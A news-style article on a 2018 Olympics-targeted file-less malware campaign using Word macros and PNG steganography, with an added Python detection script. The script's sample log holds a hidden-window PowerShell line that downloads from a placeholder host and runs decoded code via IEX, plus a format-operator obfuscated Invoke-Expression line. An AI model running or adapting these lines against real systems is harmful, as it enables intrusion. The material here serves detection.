2018 Winter Olympics being targeted by file-less malware using brand new tools
New technologies and innovations are being created daily, and the range of new threats is expanding just as fast. Malware developers are clearly watching for new techniques to incorporate into their code; in this case that includes a PowerShell scripting tool that was barely a week old.
This new malware campaign targets organizations involved in the upcoming 2018 Olympics to be held in Pyeongchang, South Korea. The targets are reported to be organizations associated with the Olympics or providing supporting roles for its infrastructure.
Recent file-less malware attacks have used PowerShell to run in-memory payloads, which in turn create a backdoor for the attackers. It is also old news that they use Word documents laced with macros and scripts that run once the file is enabled for editing.
The timing makes it quite alarming. The malicious emails appear to come from South Korea's National Counter Terrorism Center (NCTC), although researchers say they actually originate from Singapore.
The lure is a clear message that appears to be a warning from the NCTC, a perfectly timed attack meant to coincide with the actual security testing being done by that organization.
The email and its attachment prompt users to enable content so that Microsoft Word can read the attached document. Once an unsuspecting victim enables the content, it immediately launches a Visual Basic macro that runs a PowerShell script. This is where they use the newly released tool called Invoke-PSImage, which was only released on December 20, 2017.
This new tool is a steganography tool that buries PowerShell scripts in the pixels of PNG images. Combined with obfuscation using string format operators, this makes the script a lot more difficult to detect, to the point that it is nearly impossible to spot even once it has been extracted to the command line. Down the line, it is used to set up a secure connection to a command and control server, like any other malware.
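As an added example (not code from the article or from the Invoke-PSImage project), the following Python script shows what a defender can look for in process-creation telemetry to catch the chain described above: an Office application handing off to PowerShell, a command line that decodes pixels and executes the result in memory, and cmdlet names assembled with the -f string format operator. The log lines are constructed, the `parent|image|command line` layout is a simplification, the URL is a placeholder, and the pixel-decoding indicators assume the stub reads pixels through .NET System.Drawing, as the public tool's generated one-liner does.

```python
"""Detection heuristics for the macro -> PowerShell -> image-decoding chain.

Example code added for illustration; it is not from the article or from the
Invoke-PSImage project. The log lines below are constructed, in a simplified
"parent|image|command line" shape modelled on process-creation telemetry."""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample telemetry, one process-creation event per line.
# Hostnames and paths are placeholders, not indicators from the article.
SAMPLE_LOG = """\
explorer.exe|WINWORD.EXE|"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\user\\Downloads\\notice.doc"
WINWORD.EXE|powershell.exe|powershell.exe -NoP -W Hidden -Exec Bypass -C "sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead('http://placeholder.invalid/img.png'));$p=$g.GetPixel(0,0);IEX([Text.Encoding]::ASCII.GetString($o))"
WINWORD.EXE|powershell.exe|powershell.exe -C "&('{1}{0}{2}'-f'oke-Expre','Inv','ssion') ('{0}{1}'-f 'Get-Pr','ocess')"
explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1
svchost.exe|conhost.exe|conhost.exe 0xffffffff -ForceV1
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Pixel-decoding stub indicators. Assumption: the stub reads pixels through
# .NET System.Drawing, as the public tool's generated one-liner does.
IMAGE_DECODE = re.compile(r"System\.Drawing|\bBitmap\b|GetPixel", re.IGNORECASE)
# In-memory execution / download-and-run indicators.
INMEM_EXEC = re.compile(r"\bIEX\b|Invoke-Expression|Net\.WebClient|DownloadString",
                        re.IGNORECASE)
# A quoted template with two or more {n} placeholders fed to the -f operator:
# the "string format operator" obfuscation the article mentions.
FORMAT_OBFUSCATION = re.compile(
    r"""['"][^'"]*\{\d+\}[^'"]*\{\d+\}[^'"]*['"]\s*-f\b""", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    image: str


def parse_event(line: str):
    """Split a constructed 'parent|image|cmdline' record; image names lower-cased."""
    parent, image, cmdline = line.split("|", 2)
    return parent.strip().lower(), image.strip().lower(), cmdline


def analyze(log_text: str) -> List[Finding]:
    """Run all three heuristics over every event and return the findings."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        parent, image, cmdline = parse_event(line)
        # Rule 1: an Office application spawning a script host, i.e. a macro
        # handing off to PowerShell (or another interpreter).
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append(Finding(line_no, "office_spawns_script_host", image))
        if image not in {"powershell.exe", "pwsh.exe"}:
            continue
        # Rule 2: pixel decoding plus in-memory execution in one command line.
        if IMAGE_DECODE.search(cmdline) and INMEM_EXEC.search(cmdline):
            findings.append(Finding(line_no, "image_decoder_inmem_exec", image))
        # Rule 3: -f format-operator string assembly hiding cmdlet names.
        if FORMAT_OBFUSCATION.search(cmdline):
            findings.append(Finding(line_no, "format_operator_obfuscation", image))
    return findings


def flagged_lines(log_text: str):
    """Map each flagged line number to the sorted rule names it triggered."""
    result = {}
    for f in analyze(log_text):
        result.setdefault(f.line_no, []).append(f.rule)
    return {k: sorted(v) for k, v in result.items()}


if __name__ == "__main__":
    for line_no, rules in sorted(flagged_lines(SAMPLE_LOG).items()):
        print(f"line {line_no}: {', '.join(rules)}")
```

On the sample data the legitimate PowerShell backup script and the console host trigger nothing, while the two macro-launched PowerShell instances each trip two rules. Rule 1 on its own is the highest-value signal, because an Office process spawning an interpreter is rare in normal use regardless of how the payload is obfuscated; rules 2 and 3 add confidence when script block or command-line logging is available.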
The attack only lasted a few days, from December 22 to 28, 2017. The Olympics are still a month away, which gives the malware ample time to spread and take root.
It is uncertain whether the attack has completely run its course. But one thing is for sure: Invoke-PSImage is now part of the toolset that malware developers will be using in the future.
People ask how file-less malware can be prevented. Security researchers and professionals say that the attack vectors should be eliminated, one of which is the way email and malicious attachments are handled.
Extreme caution and the utmost security are, as of this writing, the only way to stop file-less malware from spreading.